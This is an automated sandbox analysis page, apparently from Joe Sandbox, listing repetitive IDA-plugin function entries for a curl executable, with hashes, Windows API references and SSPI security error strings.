Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_WRONG_PRINCIPAL
API String ID: 1435330505-1246895193
Opcode ID: 0059d72bb7212b7d13cf4b4c99c544965cdbde92f05dc7f542fbb57a277d061b
Instruction ID: b4bb594bb7561b171faa4f333cf8ee98e667273169ac4322621b720723fcd1b2
Opcode Fuzzy Hash: 0059d72bb7212b7d13cf4b4c99c544965cdbde92f05dc7f542fbb57a277d061b
Instruction Fuzzy Hash: F4112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A43B96DF3CCA4BC750

Function 000000013F49EF21 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 000000013F49EF21

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_WRONG_CREDENTIAL_HANDLE
API String ID: 1435330505-4061164511
Opcode ID: 82fcc0f9178dc25868299476682696be5c2ab5a6d2ad13e042554b6da98a8c51
Instruction ID: e49a1fe8c79683957e5dbb08958bd55e2dde7595ef6021369cb27c652911c5e0
Opcode Fuzzy Hash: 82fcc0f9178dc25868299476682696be5c2ab5a6d2ad13e042554b6da98a8c51
Instruction Fuzzy Hash: 11112A35B14B4096E6A19F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EEE5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 000000013F49EEE5
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNFINISHED_CONTEXT_DELETED
API String ID: 1435330505-784520498
Opcode ID: 7566ec670cce047f974539ac0a6cfbab37ee68ccead97b40aefb4dca074046b5
Instruction ID: 54f4bbc737589063b6501602f24ba81df1bc773b97404d8202f2ea0cfa95cf0f
Opcode Fuzzy Hash: 7566ec670cce047f974539ac0a6cfbab37ee68ccead97b40aefb4dca074046b5
Instruction Fuzzy Hash: FA112A35B14B4096E661DF20E4047DF7365F788B91F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EEFD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_UNSUPPORTED_FUNCTION, xrefs: 000000013F49EEFD

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNSUPPORTED_FUNCTION
API String ID: 1435330505-1880870521
Opcode ID: 5e952c1448b4ff57e0aa67cac9907b3cb81e88ba3a17a4f344b645d298109aa1
Instruction ID: bda50254717ee83b8d8ed3c7f15b75addde26e48a12c134cd3e9632542d2fc6a
Opcode Fuzzy Hash: 5e952c1448b4ff57e0aa67cac9907b3cb81e88ba3a17a4f344b645d298109aa1
Instruction Fuzzy Hash: 80112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EEF1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_UNKNOWN_CREDENTIALS, xrefs: 000000013F49EEF1
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNKNOWN_CREDENTIALS
API String ID: 1435330505-526997280
Opcode ID: 0c7ccf6754badb94526b334798bb17f90f1bdc6d3c6ae506c1a3afac7c706a2e
Instruction ID: 740a6039344fa4699fdb32be7ff0951cd0831f20c4a6beca719ec2a5e2c92bb6
Opcode Fuzzy Hash: 0c7ccf6754badb94526b334798bb17f90f1bdc6d3c6ae506c1a3afac7c706a2e
Instruction Fuzzy Hash: 57112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EF09 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
SEC_E_UNSUPPORTED_PREAUTH, xrefs: 000000013F49EF09
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNSUPPORTED_PREAUTH
API String ID: 1435330505-3662181683
Opcode ID: 30df4ccde53fdf39ffad4605a0487858b39623af19d0ad5aa22ec64cc6677a61
Instruction ID: f9d3307b2050cee7cfea5b9bb553826b685853a6aaf9fb82a4e53a40d0badf62
Opcode Fuzzy Hash: 30df4ccde53fdf39ffad4605a0487858b39623af19d0ad5aa22ec64cc6677a61
Instruction Fuzzy Hash: 99114835B14B4086E6619F20E4047DF7365F788B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49EF15 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_UNTRUSTED_ROOT, xrefs: 000000013F49EF15

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNTRUSTED_ROOT
API String ID: 1435330505-3666586070
Opcode ID: d2f244dddce7218a3b3ea29f2029f3774eec740347a7c77a28c5f3d9941c6c6a
Instruction ID: 7cda98e61950118b10b59de5738964e771e028dae046834ea560394e30079c8e
Opcode Fuzzy Hash: d2f244dddce7218a3b3ea29f2029f3774eec740347a7c77a28c5f3d9941c6c6a
Instruction Fuzzy Hash: E7112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EE25 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 000000013F49EE25
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_PKINIT_CLIENT_FAILURE
API String ID: 1435330505-751537933
Opcode ID: 1627c26d4eb300424a7047a3f50406876f7c33a145d383bd92fc89cb502bb4a8
Instruction ID: 494156104f721fb1542ebcdd931f53fb642f5971c90893a01df904c8c509ce3d
Opcode Fuzzy Hash: 1627c26d4eb300424a7047a3f50406876f7c33a145d383bd92fc89cb502bb4a8
Instruction Fuzzy Hash: 38112A35B14B4096E6619F20E4047DF7365FB88B51F85413AEA8E42B96DF3CCA4BC750

Function 000000013F49EE3D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_POLICY_NLTM_ONLY, xrefs: 000000013F49EE3D
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_POLICY_NLTM_ONLY
API String ID: 1435330505-2604752562
Opcode ID: 79b381ddf5f17da8cfd930ab5201a775a187c5eb0d25baf50fd767419ce7d404
Instruction ID: 587d9c69b097e1c9ef9d73accf666c3e8ddc2d9801ff2e514d1b6c2df0392650
Opcode Fuzzy Hash: 79b381ddf5f17da8cfd930ab5201a775a187c5eb0d25baf50fd767419ce7d404
Instruction Fuzzy Hash: CC115A35B14B4086E6619F20E4047DF7365FB88B91F80413AEA8E42B96DF3CCA4BC710

Function 000000013F49EE31 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_PKINIT_NAME_MISMATCH, xrefs: 000000013F49EE31
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_PKINIT_NAME_MISMATCH
API String ID: 1435330505-150002090
Opcode ID: f38405e0da77630303fafb2dff8b3ccb76a48b2bc13f3757ad187b8bdde8741f
Instruction ID: 51f6eaf5104842bda20c9c54ab9a89b859e484f289e58841519e703470facca9
Opcode Fuzzy Hash: f38405e0da77630303fafb2dff8b3ccb76a48b2bc13f3757ad187b8bdde8741f
Instruction Fuzzy Hash: C6112A35B14B4096E6619F20E4047DF7365FB88B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EE49 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_QOP_NOT_SUPPORTED, xrefs: 000000013F49EE49
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_QOP_NOT_SUPPORTED
API String ID: 1435330505-2000925551
Opcode ID: e056cf3e6dc9e0495b083fa39f9abda904dc560eeaad2d8842722b571ae5303d
Instruction ID: 75d5ee0dde4264e6009786dd44abab894e2e68cf276103f9da2369c6c7c50618
Opcode Fuzzy Hash: e056cf3e6dc9e0495b083fa39f9abda904dc560eeaad2d8842722b571ae5303d
Instruction Fuzzy Hash: 43112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EE55 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_REVOCATION_OFFLINE_C, xrefs: 000000013F49EE55
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_REVOCATION_OFFLINE_C
API String ID: 1435330505-3434868068
Opcode ID: 417c1251e3616ffe4df876f11a2543a97fb2ccc6a709b5a35591957fbf67e140
Instruction ID: 9d38c77e60392438aa64755f6e16d2a1686e540cd72e9ad72a38a8527ddcc31c
Opcode Fuzzy Hash: 417c1251e3616ffe4df876f11a2543a97fb2ccc6a709b5a35591957fbf67e140
Instruction Fuzzy Hash: 22112A35B14B4096E6619F20E4047DF7365FB88B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EDE9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
SEC_E_NO_KERB_KEY, xrefs: 000000013F49EDE9
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
